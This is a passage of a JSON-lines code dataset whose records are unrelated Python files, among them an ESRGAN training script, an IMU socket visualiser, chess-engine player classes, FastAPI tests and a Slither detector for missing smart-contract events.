self.optimizer_d = optim.Adam(self.dis.parameters(), lr=lr, betas=(b1, b2))\r\n\r\n def train(self, epochs, saved_image_directory, saved_model_directory):\r\n start_time = time.time()\r\n\r\n gen_loss_list = []\r\n dis_loss_list = []\r\n\r\n for epoch in range(epochs):\r\n cur_time = time.time()\r\n for i, (low_res_images, high_res_images) in enumerate(self.train_loader):\r\n iterations_completed = epoch*len(self.train_loader) + i\r\n\r\n b_size = len(low_res_images)\r\n\r\n low_res_images = low_res_images.to(self.device)\r\n high_res_images = high_res_images.to(self.device)\r\n\r\n real = torch.ones((b_size, *self.dis.output_shape)).to(self.device)\r\n fake = torch.zeros((b_size, *self.dis.output_shape)).to(self.device)\r\n\r\n # train generator\r\n self.optimizer_g.zero_grad()\r\n\r\n fake_images = self.gen(low_res_images)\r\n\r\n #pixel loss\r\n p_loss = self.pixel_loss_func(fake_images, high_res_images)\r\n\r\n # train generator over pixel loss for a certain number of iterations before introducing discriminator\r\n if iterations_completed < 500:\r\n p_loss.backward()\r\n self.optimizer_g.step()\r\n print(' [{}/{}][{}/{}], Pixel loss: {:.4f}\\n'.format(epoch, epochs, i, len(self.train_loader), p_loss.item()))\r\n continue\r\n\r\n r_pred = self.dis(high_res_images.to(self.device)).detach()\r\n f_pred = self.dis(fake_images)\r\n\r\n loss_g = self.loss_func_logits(f_pred - r_pred.mean(0, keepdim=True), real)\r\n\r\n fake_features = self.ext(fake_images)\r\n real_features = self.ext(high_res_images).detach()\r\n content_loss = self.content_loss_func(fake_features, real_features)\r\n\r\n g_loss = content_loss + self.lambda_adv*loss_g + self.lambda_pixel*p_loss\r\n\r\n g_loss.backward()\r\n self.optimizer_g.step()\r\n\r\n # train discriminator\r\n\r\n self.optimizer_d.zero_grad()\r\n\r\n r_pred = self.dis(high_res_images)\r\n f_pred = self.dis(fake_images.detach())\r\n\r\n r_loss = self.loss_func_logits(r_pred - f_pred.mean(0, keepdim=True), real)\r\n f_loss = self.loss_func_logits(f_pred - r_pred.mean(0, keepdim=True), fake)\r\n\r\n d_loss = (r_loss + f_loss) / 2\r\n\r\n d_loss.backward()\r\n self.optimizer_d.step()\r\n\r\n if i % 10 == 0:\r\n print(' [{}/{}][{}/{}], Gen Loss: {:.4f}, Dis Loss: {:.4f}\\n'.format(epoch, epochs, i, len(self.train_loader), g_loss.item()/b_size, d_loss.item()/b_size))\r\n gen_loss_list.append(g_loss.item()/b_size)\r\n dis_loss_list.append(d_loss.item()/b_size)\r\n\r\n cur_time = time.time() - cur_time\r\n\r\n print('Time Taken: {:.4f} seconds. Estimated {:.4f} hours remaining\\n'.format(cur_time, (epochs-epoch)*(cur_time)/3600))\r\n\r\n # show samples\r\n low_res_sample, high_res_sample = next(iter(self.test_loader))\r\n idx = np.random.randint(0, self.batch_size, 1)\r\n fake_image = self.gen(low_res_sample[idx].to(self.device))\r\n fake_image = fake_image.cpu().detach()\r\n ground_truth = high_res_sample[idx]\r\n image_grid = torchvision.utils.make_grid([fake_image[0], ground_truth[0]], nrow=2, normalize=True)\r\n _, plot = plt.subplots(figsize=(12, 12))\r\n plt.axis('off')\r\n plot.imshow(image_grid.permute(1, 2, 0))\r\n plt.savefig(saved_image_directory + '/epoch_{}_checkpoint.jpg'.format(epoch), bbox_inches='tight')\r\n\r\n # save models to model_directory\r\n torch.save(self.gen.state_dict(), saved_model_directory + '/generator_{}.pt'.format(epoch))\r\n torch.save(self.dis.state_dict(), saved_model_directory + '/discriminator_{}.pt'.format(epoch))\r\n torch.save(self.optimizer_g.state_dict(), saved_model_directory + '/optimizer_g_{}.pt'.format(epoch))\r\n torch.save(self.optimizer_d.state_dict(), saved_model_directory + '/optimizer_d_{}.pt'.format(epoch))\r\n\r\n\r\n finish_time = time.time() - start_time\r\n print('Training Finished. Took {:.4f} seconds or {:.4f} hours to complete.'.format(finish_time, finish_time/3600))\r\n return gen_loss_list, dis_loss_list\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Hyperparameters for training GAN')\r\n\r\n # hyperparameter loading\r\n parser.add_argument('--lr_dir_train', type=str,default='data/DIV2K_train_LR_mild', help='directory to low resolution training set')\r\n parser.add_argument('--hr_dir_train', type=str,default='data/DIV2K_train_HR', help='directory to high resolution training set')\r\n parser.add_argument('--lr_dir_test', type=str,default='data/DIV2K_valid_LR_mild', help='directory to low resolution test set')\r\n parser.add_argument('--hr_dir_test', type=str,default='data/DIV2K_valid_HR', help='directory to high resolution test set')\r\n parser.add_argument('--lr_length', type=int,default=128, help='Length of low resolution image (square image ideal)')\r\n parser.add_argument('--hr_length', type=int,default=512, help='Length of high resolution image (square image ideal)')\r\n parser.add_argument('--saved_image_directory', type=str, default='data/saved_images', help='directory to where image samples will be saved')\r\n parser.add_argument('--saved_model_directory', type=str, default='saved_models', help='directory to where model weights will be saved')\r\n parser.add_argument('--batch_size', type=int, default=64, help='size of batches passed through networks at each step')\r\n parser.add_argument('--lambda_adv', type=float, default=5e-3, help='lambda factor for gan loss')\r\n parser.add_argument('--lambda_pixel', type=float, default=1e-2, help='lambda factor for generator pixel loss')\r\n parser.add_argument('--b1', type=float, default=0.9, help='optimizer beta 1 factor')\r\n parser.add_argument('--b2', type=float, default=0.999, help='optimizer beta 2 factor')\r\n parser.add_argument('--channels', type=int, default=3, help='number of color channels in images')\r\n parser.add_argument('--feature_space', type=int, default=64, help='ideal feature space for models to work in')\r\n parser.add_argument('--device', type=str, default='cpu', help='cpu or gpu depending on availability and compatability')\r\n parser.add_argument('--lr', type=float, default=0.0002, help='learning rate of models')\r\n parser.add_argument('--num_workers', type=int, default=0, help='workers simultaneously putting data into RAM')\r\n parser.add_argument('--epochs', type=int, default=100, help='number of iterations of dataset through network for training')\r\n args = parser.parse_args()\r\n\r\n lr_dir_train = args.lr_dir_train\r\n hr_dir_train = args.hr_dir_train\r\n lr_dir_test = args.lr_dir_test\r\n hr_dir_test = args.hr_dir_test\r\n lr_length = args.lr_length\r\n hr_length = args.hr_length \r\n saved_image_dir = args.saved_image_directory\r\n saved_model_dir = args.saved_model_directory\r\n batch_size = args.batch_size\r\n lambda_adv = args.lambda_adv\r\n lambda_pixel = args.lambda_pixel\r\n b1 = args.b1 \r\n b2 = args.b2\r\n channels = args.channels\r\n feature_space = args.feature_space\r\n device = args.device\r\n lr = args.lr\r\n num_workers = args.num_workers\r\n epochs = args.epochs\r\n\r\n gan = Trainer(lr_dir_train, hr_dir_train, lr_dir_test, hr_dir_test, lr_length, hr_length, batch_size, lambda_adv, lambda_pixel, b1, b2, channels, feature_space, device, lr, num_workers)\r\n gen_loss_lost, dis_loss_list = gan.train(\r\n epochs, saved_image_dir, saved_model_dir)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"u7javed/Image-Super-Resolution-Enhancer-via-ESRGAN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11220,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"47"} +{"seq_id":"34819662436","text":"import os\n\n\nclass DatasetCatalog(object):\n DATA_DIR = 'data'\n\n @staticmethod\n def get(name):\n if 'semantic_kitti_4d' in name:\n data_dir = DatasetCatalog.DATA_DIR\n args = dict(\n root=os.path.join(data_dir, 'semanticKITTI'),\n )\n return dict(\n factory='SemanticKittiDataset4d',\n args=args\n )\n elif 'semantic_kitti_eve' in name:\n data_dir = DatasetCatalog.DATA_DIR\n args = dict(\n root=os.path.join(data_dir, 'semanticKITTI'),\n )\n return dict(\n factory='SemanticKittiDatasetEve',\n args=args\n )\n elif 'semantic_kitti' in name:\n data_dir = DatasetCatalog.DATA_DIR\n args = dict(\n root=os.path.join(data_dir, 'semanticKITTI'),\n )\n return dict(\n factory='SemanticKittiDataset',\n args=args\n )\n else:\n raise RuntimeError(\"Dataset not available: {}\".format(name))\n","repo_name":"ecr23xx/eve","sub_path":"config/path_catalog.py","file_name":"path_catalog.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"70466149903","text":"import socket\nimport time \nimport json\nimport ast\nimport numpy as np\nimport math\nfrom vpython import *\n\nsys_time = time.time_ns\n\nHOST = '127.0.0.1'\nPORT = 4269\n\n#vpython var\nscene = canvas()\nscene2 = canvas()\n\nscene.range=5\nscene.forward=vector(-1,-1,-1)\n \nscene.width=600\nscene.height=600\n\nscene2.range=5\nscene2.forward=vector(-1,-1,-1)\n\nscene2.width=600\nscene2.height=600\n \nxarrow=arrow(canvas=scene,lenght=2, shaftwidth=.1, color=color.red,axis=vector(1,0,0))\nyarrow=arrow(canvas=scene,lenght=2, shaftwidth=.1, color=color.green,axis=vector(0,1,0))\nzarrow=arrow(canvas=scene,lenght=4, shaftwidth=.1, color=color.blue,axis=vector(0,0,1))\n \nfrontArrow=arrow(canvas=scene2,length=2,shaftwidth=.1,color=color.purple,axis=vector(1,0,0))\nupArrow=arrow(canvas=scene2,length=2,shaftwidth=.1,color=color.magenta,axis=vector(0,1,0))\nsideArrow=arrow(canvas=scene2,length=2,shaftwidth=.1,color=color.orange,axis=vector(0,0,1))\n \n# bBoard=box(length=6,width=2,height=.2,opacity=.8,pos=vector(0,0,0,))\n# bn=box(length=1,width=.75,height=.1, pos=vector(-.5,.1+.05,0),color=color.blue)\n# nano=box(lenght=1.75,width=.6,height=.1,pos=vector(-2,.1+.05,0),color=color.green)\n# myObj=compound([bBoard,bn,nano])\n#----\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind((HOST, PORT))\ns.listen(5)\n\nprint('server start at: %s:%s' % (HOST, PORT))\nprint('wait for connection...')\n\n#f = open(str(sys_time()) + 'log_file.txt',\"w+\")\n\ndef unsigned_to_signed(ulong):\n\tiv = ulong\n\tif(ulong & 0b1000000000000000):\n\t\tiv = -65536 + ulong\n\t\t\n\treturn iv\n\ndef R2Q(roll, pitch, yaw):\n\n\t\tqx = np.sin(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) - np.cos(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)\n\t\tqy = np.cos(roll/2) * np.sin(pitch/2) * np.cos(yaw/2) + np.sin(roll/2) * np.cos(pitch/2) * np.sin(yaw/2)\n\t\tqz = np.cos(roll/2) * np.cos(pitch/2) * np.sin(yaw/2) - np.sin(roll/2) * np.sin(pitch/2) * np.cos(yaw/2)\n\t\tqw = np.cos(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) + np.sin(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)\n\t\treturn [qx, qy, qz, qw]\n\ndef imu_decoding(sensor_data):\n acc = [ #g\n unsigned_to_signed((sensor_data[0]<<8) + sensor_data[1])*(20/2**16), \n unsigned_to_signed((sensor_data[2]<<8) + sensor_data[3])*(20/2**16),\n unsigned_to_signed((sensor_data[4]<<8) + sensor_data[5])*(20/2**16)\n ]\n #acc = [acc[0],acc[1],acc[2],0,0,0,0,0,0]\n rate = [ #rad/s\n unsigned_to_signed((sensor_data[6]<<8) + sensor_data[7])*(7*3.14/2**16),\n unsigned_to_signed((sensor_data[8]<<8) + sensor_data[9])*(7*3.14/2**16),\n unsigned_to_signed((sensor_data[10]<<8) + sensor_data[11])*(7*3.14/2**16)\n ]\n #rate = [rate[0],rate[1],rate[2],0,0,0,0,0,0]\n quat = R2Q(rate[0],rate[1],rate[2])\n #quat = [quat[0],quat[1],quat[2],quat[3],0,0,0,0,0]\n temp = [ #c\n unsigned_to_signed((sensor_data[12]<<8) + sensor_data[13])*(200/2**16),\n unsigned_to_signed((sensor_data[14]<<8) + sensor_data[15])*(200/2**16),\n unsigned_to_signed((sensor_data[16]<<8) + sensor_data[17])*(200/2**16)\n ]\n temp_b = ((sensor_data[18]<<8) + sensor_data[19])*(200/2**16) #c\n timer = ((sensor_data[20]<<8) + sensor_data[21])*(15.259022) #uS\n\n BITstatus = (sensor_data[22]<<8 + sensor_data[23])\n\n return [acc,rate,quat,temp,temp_b,timer,BITstatus]\nroll = 0.0\npitch = 0.0\nyaw = 0.0\nwhile True:\n conn, addr = s.accept()\n print('connected by ' + str(addr))\n\n while True:\n indata = conn.recv(1024)\n if len(indata) != 0: # connection closed\n indata = indata.decode()\n\n try:\n\n indata_list = ast.literal_eval(indata)\n title = 0\n\n imu_msg = indata_list[0]\n title += 1\n imu_data = imu_decoding(imu_msg)\n\n roll += float(imu_data[1][0])*0.01\n pitch += float(imu_data[1][1])*0.01\n yaw += float(imu_data[1][2])*0.01\n\n rate(100)\n k=vector(cos(yaw)*cos(pitch), sin(pitch), sin(yaw)*cos(pitch))\n y=vector(0,1,0)\n s=cross(k,y)\n v=cross(s,k)\n vrot=v*cos(roll)+cross(k,v)*sin(roll)\n\n frontArrow.axis=k\n sideArrow.axis=cross(k,vrot)\n upArrow.axis=vrot\n\n # myObj.axis=k\n # myObj.up=v\n # sideArrow.length=2\n # frontArrow.length=2\n # upArrow.length=2\n \n except:\n pass\n\n\n \ns.close()","repo_name":"Jaron0211/soft_sync","sub_path":"PTP_program/imu_sync_ptp_server_visulization.py","file_name":"imu_sync_ptp_server_visulization.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37671710662","text":"import requests\nimport multiprocessing\nfrom cloudmesh.common.Benchmark import Benchmark\nfrom cloudmesh.common.util import HEADING\nfrom multiprocessing import Pool\nimport sys\nimport io\n\ndef test_download_data(args):\n client_file = args[0]\n server_file = args[1]\n id = args[2]\n HEADING()\n Benchmark.Start()\n params = {'id': str(id)}\n r = requests.get(f\"https://us-east1-anthony-orlowski.cloudfunctions.net/eigenfaces_download_data_http\", params=params)\n Benchmark.Stop()\n assert r.status_code == 200\n with io.open(server_file, 'a') as f:\n f.write(r.text)\n f.close()\n print_benchmark(client_file)\n\ndef test_train(args):\n client_file = args[0]\n server_file = args[1]\n id = args[2]\n HEADING()\n Benchmark.Start()\n params = {'id': str(id)}\n r = requests.get(f\"https://us-east1-anthony-orlowski.cloudfunctions.net/eigenfaces_train_http\", params=params)\n Benchmark.Stop()\n assert r.status_code == 200\n with io.open(server_file, 'a') as f:\n f.write(r.text)\n f.close()\n print_benchmark(client_file)\n\ndef test_upload(args):\n client_file = args[0]\n server_file = args[1]\n id = args[2]\n HEADING()\n Benchmark.Start()\n params = {'id': str(id)}\n files = {'example_image.jpg': open('example_image.jpg', 'rb')}\n r = requests.post(url=f\"https://us-east1-anthony-orlowski.cloudfunctions.net/eigenfaces_upload_http\", files=files, params=params)\n Benchmark.Stop()\n assert r.status_code == 200\n with io.open(server_file, 'a') as f:\n f.write(r.text)\n f.close()\n print_benchmark(client_file)\n\ndef test_predict(args):\n client_file = args[0]\n server_file = args[1]\n id = args[2]\n HEADING()\n Benchmark.Start()\n params = {'id': str(id)}\n r = requests.get(f\"https://us-east1-anthony-orlowski.cloudfunctions.net/eigenfaces_predict_http\", params=params)\n Benchmark.Stop()\n assert r.status_code == 200\n with io.open(server_file, 'a') as f:\n f.write(r.text)\n f.close()\n print_benchmark(client_file)\n\ndef print_benchmark(client_file):\n old_stdout = sys.stdout\n new_stdout = io.StringIO()\n sys.stdout = new_stdout\n Benchmark.print()\n result = new_stdout.getvalue()\n sys.stdout = old_stdout\n with io.open(client_file, 'a') as f:\n f.write(result)\n f.close()\n\ndef run_all_tests_parallel():\n functions = [test_train, test_upload, test_predict]\n for f in functions:\n num = 30\n with Pool(num) as p:\n client_file = f'cold-start-client-{sys.argv[1]}'\n server_file = f'cold-start-server-{sys.argv[1]}'\n args = [(client_file, server_file, i) for i in range(num)]\n p.map(f, args)\n num = 30\n with Pool(num) as p:\n client_file = f'warm-start-client-{sys.argv[1]}'\n server_file = f'warm-start-server-{sys.argv[1]}'\n args = [(client_file, server_file, i) for i in range(num)]\n p.map(f, args)\n\nif __name__ == \"__main__\":\n test_train((\"client.txt\", \"server.txt\",\"1\"))\n #run_all_tests_parallel()\n #for i in range(30):\n # client_file = f'cold-start-client-{sys.argv[1]}.txt'\n # server_file = f'cold-start-server-{sys.argv[1]}.txt'\n # args = []\n # test_download_data()","repo_name":"aporlowski/ef-faas","sub_path":"service/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23087595902","text":"import pytest\n\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy_utils import database_exists, create_database\nfrom app.main import app\nfrom db.connection import get_db , Base\nfrom services.movies.moviesScore_service import create_movie_score\n\n\nfrom config.settings import Settings\n\nsettings = Settings()\nSQLALCHEMY_DATABASE_URL = f\"mysql+pymysql://{settings.database_user}:{settings.database_pass}@{settings.database_url}/test_db\"\n\nengine = create_engine(\n SQLALCHEMY_DATABASE_URL \n)\n\nif not database_exists(engine.url):\n create_database(engine.url)\n\nTestingSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\n@pytest.fixture()\ndef session():\n Base.metadata.drop_all(bind=engine)\n Base.metadata.create_all(bind=engine)\n\n db = TestingSessionLocal()\n\n try:\n yield db\n finally:\n db.close()\n\n@pytest.fixture()\ndef client(session):\n # Dependency override\n def override_get_db():\n try:\n yield session\n finally:\n session.close()\n app.dependency_overrides[get_db] = override_get_db\n yield TestClient(app)\n\ndef test_movie_score_get_all(client):\n res = client.get(\"/api/movies_score\")\n assert res.status_code == 200\n\ndef test_movie_score_get_one(client):\n res = client.get(\"/api/movie_score/?movie_name=string&movie_provider=string\")\n assert res.status_code == 404\n assert res.json()['detail'] == \"Movie not found\"\n\n\ndef test_create_todos(client):\n res = client.post(\"/api/movie_score\", json={\"movie\": \"Geoscape\", \"provider\": \"Australia\", \"score\": 9.3})\n assert res.status_code == 201\n res = client.post(\"/api/movie_score\", json={\"movie\": \"Geoscape\", \"provider\": \"Australia\", \"score\": 9.3})\n assert res.status_code == 400\n assert res.json()['detail'] == \"Movie is already registered\"\n","repo_name":"AlexHorvatGeo/geoscape-api-movies-score","sub_path":"movies-score-back-api/app/test/movieScore_routes_test/movieScore_crud_test.py","file_name":"movieScore_crud_test.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40905521059","text":"from enum import Enum\nfrom subprocess import Popen, PIPE, STDOUT\nfrom PythonChessLibrary.tools import *\nimport re, random, sys, berserk\n\n\nclass BasePlayer:\n\tdef get_move(self, game):\n\t\t\"\"\"Method Documentation\"\"\"\n\t\treturn\n\n\tdef ask_draw(self, game):\n\t\t\"\"\"Method Documentation\"\"\"\n\t\treturn\n\n\tdef init(self):\n\t\t\"\"\"Method Documentation\"\"\"\n\t\treturn\n\n\tdef __init__(self, *args, **kwargs):\n\t\tself.debug = args[0]\n\n\t\tself.__dict__.update(kwargs)\n\n\t\tself.init()\n\t\t\n\nclass OnlinePlayer(BasePlayer):\n\tdef get_move(self, game):\n\t\tprint(\"getting move for online player\")\n\t\t# wait for the online player to make a move and then report it\n\t\tfor event in self.client.client.bots.stream_game_state(self.client.gameid):\n\t\t\tprint(event)\n\t\t\tif event['type'] == 'gameState':\n\t\t\t\treturn event['moves'].split(\" \")[-1]\n\n\tdef send_move(self, move):\n\t\tself.client.client.bots.make_move(self.client.gameid, move)\n\nclass UserPlayer(BasePlayer):\n\tdef get_move(self, game):\n\t\tprint(\"Input your move ---> \", end=\"\")\n\t\treturn input()\n\nclass RandomPlayer(BasePlayer):\n\tdef get_move(self, chessnut):\n\t\tmoves = chessnut.get_moves()\n\t\tif len(moves) == 0:\n\t\t\tprint(\"Move History: \" + str(chessnut.move_history), file=sys.stderr)\n\t\t\tprint(\"fen string: \" + str(chessnut.get_fen()), file=sys.stderr)\n\t\t\tprint(\"_all_moves: \" + str(chessnut._all_moves(player='b')), file=sys.stderr)\n\t\tdprint(\"Possible Moves: \" + str(moves), self.debug)\n\n\t\treturn moves[random.randint(0, len(moves)-1)]\n\nclass BotPlayer(BasePlayer):\n\tdef get_move(self, game):\n\t\t# Choose a random starting move if we are testing with bots\n\t\tif hasattr(game, 'test_mode') and len(game.chessnut_game.move_history) == 0:\n\t\t\tvalid_moves = game.chessnut_game.get_moves()\n\t\t\treturn valid_moves[random.randint(0, len(valid_moves)-1)]\n\n\t\t# start a new game to be safe\n\t\tself.proc.stdin.write(\"ucinewgame\\n\")\n\n\t\t# give state\n\t\tself.proc.stdin.write(\"position fen \" + game.chessnut_game.get_fen() + \"\\n\")\n\n\t\t#tell it to search\n\t\tself.proc.stdin.write(\"go wtime 122000 btime 120000 winc 2000 binc 2000 depth 8\\n\")\n\n\t\tself.proc.stdin.flush()\n\n\t\tdprint(\"finding best move...\", self.debug)\n\n\t\t#read in best move\n\t\tresponse = \"\"\n\t\twhile not response.startswith(\"bestmove\"):\n\t\t\tresponse = self.proc.stdout.readline()\n\n\t\t# Parse the response string\n\t\tmove = response.split(\" \")[1].strip()\n\n\t\treturn move\n\n\tdef init(self):\n\t\tengine_path = self.engine_path if self.engine_path else get_config_dict()['engine_path']\n\t\tself.proc = Popen([engine_path], stdin=PIPE, stdout=PIPE, stderr=STDOUT, encoding='UTF8')\n\n\t\t#read intro\n\t\tresponse = self.proc.stdout.readline()\n\t\tdprint(response, self.debug, end=\"\")\n\n\t\t#tell it to use uci\n\t\tself.proc.stdin.write(\"uci\\n\")\n\t\tself.proc.stdin.flush()\n\t\t\n\t\tresponse = \"\"\n\t\twhile response.strip() != \"uciok\":\n\t\t\tresponse = self.proc.stdout.readline()\n\t\t\tdprint(response, self.debug, end=\"\")\n\n\t\t#setoptions if you want\n\t\t#setoption name Hash value 32\n\t\t#info string Hash table allocation: Windows large pages not used.\n\n\t\t#indicate ready\n\t\tself.proc.stdin.write(\"isready\\n\")\n\t\tself.proc.stdin.flush()\n\t\tresponse = self.proc.stdout.readline()\n\t\tif response.strip() != \"readyok\":\n\t\t\t#fucking panic or something idk\n\t\t\tprint(\"Oh shit it aint ready coach. Engine said: \", response.strip())\n\t\t\texit(0)\n\n\t\t#start new uci game\n\t\tself.proc.stdin.write(\"ucinewgame\\n\")","repo_name":"jschultz38/PythonChessLibrary","sub_path":"PythonChessLibrary/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72904847503","text":"\"\"\"\nModule detecting missing events for critical contract parameters set by owners and used in arithmetic\n\n\"\"\"\nfrom typing import List, Tuple\n\nfrom slither.analyses.data_dependency.data_dependency import is_tainted\nfrom slither.core.cfg.node import Node\nfrom slither.core.declarations.contract import Contract\nfrom slither.core.declarations.function_contract import FunctionContract\nfrom slither.core.solidity_types.elementary_type import ElementaryType, Int, Uint\nfrom slither.core.variables.state_variable import StateVariable\nfrom slither.detectors.abstract_detector import (\n AbstractDetector,\n DetectorClassification,\n DETECTOR_INFO,\n)\nfrom slither.slithir.operations.event_call import EventCall\nfrom slither.utils.output import Output\n\n\nclass MissingEventsArithmetic(AbstractDetector):\n \"\"\"\n Missing events for critical contract parameters set by owners and used in arithmetic\n \"\"\"\n\n ARGUMENT = \"events-maths\"\n HELP = \"Missing Events Arithmetic\"\n IMPACT = DetectorClassification.LOW\n CONFIDENCE = DetectorClassification.MEDIUM\n\n WIKI = \"https://github.com/crytic/slither/wiki/Detector-Documentation#missing-events-arithmetic\"\n WIKI_TITLE = \"Missing events arithmetic\"\n WIKI_DESCRIPTION = \"Detect missing events for critical arithmetic parameters.\"\n\n # region wiki_exploit_scenario\n WIKI_EXPLOIT_SCENARIO = \"\"\"\n```solidity\ncontract C {\n\n modifier onlyOwner {\n if (msg.sender != owner) throw;\n _;\n }\n\n function setBuyPrice(uint256 newBuyPrice) onlyOwner public {\n buyPrice = newBuyPrice;\n }\n\n function buy() external {\n ... // buyPrice is used to determine the number of tokens purchased\n } \n}\n```\n`setBuyPrice()` does not emit an event, so it is difficult to track changes in the value of `buyPrice` off-chain. \n\"\"\"\n # endregion wiki_exploit_scenario\n\n WIKI_RECOMMENDATION = \"Emit an event for critical parameter changes.\"\n\n @staticmethod\n def _detect_unprotected_use(\n contract: Contract, sv: StateVariable\n ) -> List[Tuple[Node, FunctionContract]]:\n unprotected_functions = [\n function for function in contract.functions_declared if not function.is_protected()\n ]\n return [\n (node, function)\n for function in unprotected_functions\n for node in function.nodes\n if sv in node.state_variables_read\n ]\n\n def _detect_missing_events(\n self, contract: Contract\n ) -> List[Tuple[FunctionContract, List[Tuple[Node, List[Tuple[Node, FunctionContract]]]]]]:\n \"\"\"\n Detects if critical contract parameters set by owners and used in arithmetic are missing events\n :param contract: The contract to check\n :return: Functions with nodes of critical operations but no events\n \"\"\"\n results = []\n\n for function in contract.functions_entry_points:\n nodes = []\n\n # Check for any events in the function and skip if found\n # Note: not checking if event corresponds to critical parameter\n if any(ir for node in function.nodes for ir in node.irs if isinstance(ir, EventCall)):\n continue\n\n # Ignore constructors and private/internal functions\n # Heuristic-1: functions writing to critical parameters are typically \"protected\".\n # Skip unprotected functions.\n if function.is_constructor or not function.is_protected():\n continue\n\n # Heuristic-2: Critical operations are where state variables are written and tainted\n # Heuristic-3: Variables of interest are int/uint types that are used (mostly in arithmetic)\n # in other unprotected functions\n # Heuristic-4: Critical operations present but no events in the function is not a good practice\n for node in function.nodes:\n for sv in node.state_variables_written:\n if (\n is_tainted(sv, function)\n and isinstance(sv.type, ElementaryType)\n and sv.type.type in Int + Uint\n ):\n used_nodes = self._detect_unprotected_use(contract, sv)\n if used_nodes:\n nodes.append((node, used_nodes))\n\n if nodes:\n results.append((function, nodes))\n return results\n\n def _detect(self) -> List[Output]:\n \"\"\"Detect missing events for critical contract parameters set by owners and used in arithmetic\n Returns:\n list: {'(function, node)'}\n \"\"\"\n\n # Check derived contracts for missing events\n results = []\n for contract in self.compilation_unit.contracts_derived:\n missing_events = self._detect_missing_events(contract)\n for (function, nodes) in missing_events:\n info: DETECTOR_INFO = [function, \" should emit an event for: \\n\"]\n for (node, _) in nodes:\n info += [\"\\t- \", node, \" \\n\"]\n res = self.generate_result(info)\n results.append(res)\n return results\n","repo_name":"crytic/slither","sub_path":"slither/detectors/operations/missing_events_arithmetic.py","file_name":"missing_events_arithmetic.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":4676,"dataset":"github-code","pt":"47"} +{"seq_id":"8086993819","text":"__author__ = 'Deivid Aparecido Henrique'\n__email__ = 'deividaphen@gmail.com'\n\nimport pandas as pd\nimport numpy as np\nimport keras\nimport matminer\nimport pickle\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matminer.utils.io import load_dataframe_from_json, store_dataframe_as_json\n\n#dataframe with all numerical descriptors\nfdf = load_dataframe_from_json('metisdb.json')\n\n#excluding non-ionic compounds\nnot_ionic = fdf['compound possible'] == 0\nfdf = fdf[not_ionic]\n\n#completing null or non-finite cells\nfdf = fdf.fillna(0)\nfdf = fdf.replace([np.inf, -np.inf], 0)\n\n#possible properties to be predicted\ntargetsList = ['K_VRH','G_VRH','elastic_anisotropy','poisson_ratio']\ny = fdf[targetsList]\n\n#excluded = non-numerical descriptors\nexcluded = ['material_id', 'structure', 'elastic_anisotropy',\n\t\t\t'K_VRH', 'G_VRH', 'poisson_ratio', 'elasticity',\n 'formula', 'composition', 'composition_oxid',\n 'HOMO_character', 'HOMO_element',\n 'LUMO_character', 'LUMO_element']\n\nX = fdf.drop((targetsList+excluded), axis=1)\n\n#normalizing values\nscaler = MinMaxScaler(feature_range=(0, 1))\nX = pd.DataFrame(scaler.fit_transform(X), columns=X.columns, index=X.index)\n\n#correcting indexes\nX, y = X.sort_index(), y.sort_index()\n\n#exporting\nprint(\"The descriptor dataset has {} entries\".format(fdf.shape))\nprint (X.head())\n\nstore_dataframe_as_json(X, 'data/descriptors.json', compression=None, orient='split')\nstore_dataframe_as_json(y, 'data/targets.json', compression=None, orient='split')","repo_name":"deividaphen/sinope","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14331834268","text":"from rest_framework import serializers\n\nfrom graph import graphs\nfrom graph.models import Graph\nfrom machine.models import Machine\n\nclass GraphSerializer(serializers.ModelSerializer):\n class Meta:\n model = Graph\n fields = (\"Machine\", \"GraphType\", \"X\", \"Y\", \"Z\", \"Color\", \"ColorScales\", \"div\")\n depth = 1\n\n div = serializers.SerializerMethodField()\n\n\n def validate_Machine(self, value):\n Machine_ID = int( value )\n machine = Machine.objects.get( pk=Machine_ID )\n value = machine\n return value\n\n def get_div( self, graph ):\n machine = graph.Machine\n GraphType = graph.GraphType\n x = graph.X\n y = graph.Y\n z = graph.Z\n color = None\n colorset = graph.ColorScales\n\n try:\n if GraphType == \"1\":\n graph_div = graphs.g1(machine, x, y, color, colorset)\n elif GraphType == \"2\":\n graph_div = graphs.g2(machine, x, y, color, colorset)\n elif GraphType == \"3\":\n graph_div = graphs.g3(machine, x, y, color, colorset)\n elif GraphType == \"4\":\n graph_div = graphs.g4(machine, x, y, z, color, colorset)\n elif GraphType == \"5\":\n graph_div = graphs.g5(machine, color, colorset)\n elif GraphType == \"6\":\n graph_div = graphs.g6(machine, x, y, color, z, colorset)\n elif GraphType == \"7\":\n graph_div = graphs.g7(machine, x, y, colorset)\n elif GraphType == \"8\":\n graph_div = graphs.g8(machine, x, y, colorset)\n elif GraphType == 